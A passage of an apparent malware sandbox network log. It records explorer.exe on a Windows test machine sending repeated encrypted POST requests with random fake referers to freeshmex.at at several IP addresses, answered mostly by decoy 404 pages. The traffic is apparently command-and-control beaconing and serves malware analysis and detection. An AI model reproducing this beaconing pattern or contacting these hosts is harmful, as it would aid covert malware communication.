                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 271
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:25.817035913 CET | 1259 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:25 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    18 | 192.168.2.4 | 49714 | 95.107.163.44 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:25.907423019 CET | 1260 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://qhcqdle.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 329
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:26.099426031 CET | 1260 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:25 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 50
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1f 62 43 e4 37 01 fe ef 46 ea d0 ec a6 6d 81 3e d9 f7 22 5e 5a 85 84 8b cb 7c 9a 2e 1d 03
                    Data Ascii: #\6bC7Fm>"^Z|.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    19 | 192.168.2.4 | 49716 | 109.102.255.230 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:27.645973921 CET | 1794 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bussc.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 187
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:27.930973053 CET | 1795 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:27 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    2 | 192.168.2.4 | 49697 | 211.53.230.67 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:01.762887001 CET | 138 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://hdnuetf.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 178
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:03.711689949 CET | 139 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:02 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    20 | 192.168.2.4 | 49717 | 190.140.74.43 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:28.179250956 CET | 1796 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://rfiijpjae.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 179
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:29.175075054 CET | 1796 | IN | HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:28 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    21 | 192.168.2.4 | 49718 | 109.102.255.230 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:29.315015078 CET | 1797 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bowsudmxn.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 219
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:29.617204905 CET | 1798 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:29 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    22 | 192.168.2.4 | 49719 | 211.53.230.67 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:29.910173893 CET | 1799 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://slkwmgvhmh.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 354
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:29.910357952 CET  1800  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 7a 58 f9 f8
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuzXIXGese$i[5/%^6'J?9(&y;=X5j1_2Oynl-8ticC6
                    Nov 24, 2022 20:13:30.751532078 CET  1800  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:30 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    23  192.168.2.4  49720  211.171.233.129  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:31.030881882 CET  1801  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bpaefk.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 166
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:31.030881882 CET  1802  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 22 1b c1 a9
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu"n[q`U~V |7_G;YA(CPIDe$tg~
                    Nov 24, 2022 20:13:31.995224953 CET  1802  IN  HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:31 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    24  192.168.2.4  49721  211.53.230.67  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:32.276055098 CET  1803  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://uaymxpjge.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 300
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:32.276055098 CET  1803  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 77 14 df 90
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuw_ab\g?b~;@J9eKZV& GA ).qR/P}?KL.7/wP*ZNforp)7b
                    Nov 24, 2022 20:13:33.390597105 CET  1804  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:32 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    25  192.168.2.4  49722  95.107.163.44  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:33.471035004 CET  1805  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://wfwtjemoof.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 277
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:33.471076965 CET  1805  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 74 15 e8 fd
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vutz@MlD#2V yfK' Jt7n57=7{^CQ#|{K/,kpgBFWG!t_X_
                    Nov 24, 2022 20:13:33.639409065 CET  1806  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:33 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    26  192.168.2.4  49723  178.31.176.42  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:33.809376001 CET  1807  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://rpaquepn.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 268
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:33.809408903 CET  1807  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 3a 03 ca 9e
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu:a"nO"] 73dyVp|@J=znZSD[8&#.]P"7KOMY3g42uw\CHfv0v
                    Nov 24, 2022 20:13:34.086180925 CET  1808  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:33 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    27  192.168.2.4  49724  95.107.163.44  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:34.343410969 CET  1809  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://uphkrwii.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 197
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:34.343518972 CET  1809  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 3b 33 c5 a6
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu;3CsWlPNY8@d><pD/MNLXnfH_`Gh[{-+l
                    Nov 24, 2022 20:13:34.497175932 CET  1810  IN  HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:34 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    28  192.168.2.4  49725  109.102.255.230  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:34.740168095 CET  1811  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://mifwrnveyh.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 110
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:34.740305901 CET  1811  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 34 4c ad fb
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu4LN`odg?i
                    Nov 24, 2022 20:13:34.972809076 CET  1812  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:34 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    29  192.168.2.4  49726  190.140.74.43  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:35.645670891 CET  1813  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://motvx.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 259
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:35.645742893 CET  1813  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 40 5a b8 80
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu@ZgFZbjRgtZ]Zf~( ,n*1\]J[J3{LlO$YkKc(T;Q+bG#qx-X
                    Nov 24, 2022 20:13:36.539628983 CET  1814  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:36 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    3  192.168.2.4  49698  211.40.39.251  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:04.464222908 CET  140  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://jccvg.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 200
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:04.464287996 CET  141  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2d 4e d8 91
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu-N`UCo49"-.]BT0q,}T^VZ!,75KpG!;.Sy*r+F
                    Nov 24, 2022 20:13:05.402805090 CET  141  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:05 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    30  192.168.2.4  49727  178.31.176.42  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:37.610042095 CET  1815  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bfgpwwck.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 116
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:37.610502005 CET  1815  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 55 15 cd 81
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuU\FXXefJT@9;
                    Nov 24, 2022 20:13:37.977166891 CET  1816  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:37 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    31  192.168.2.4  49728  211.171.233.129  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:38.277184010 CET  1817  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://agqugnol.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 337
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:38.277184010 CET  1817  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 4a 36 dc 8b
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuJ6dNi~|wqyV<8cM\qVCtPC/Nb4M8yUxVa%WZBX<^|&rz6XCnu|4>+
                    Nov 24, 2022 20:13:39.528865099 CET  1817  IN  HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:38 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    32  192.168.2.4  49729  95.107.163.44  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:39.616995096 CET  1818  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://gxxlrwdw.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 172
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:39.617022991 CET  1818  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 5d 49 cb bb
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu]IN\lX.f%?fY.vjV\k9Wl$A(b!=
                    Nov 24, 2022 20:13:39.801582098 CET  1819  IN  HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:39 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    33  192.168.2.4  49730  109.102.255.230  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:39.882327080 CET  1820  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://jhiornjar.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 353
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:39.882327080 CET  1820  OUT  Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 31 00 ca 81
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu1GCXRml,/7EAIybJ'x$KijC+,M[O/7r\N##>h5Zv[lKy$R_4
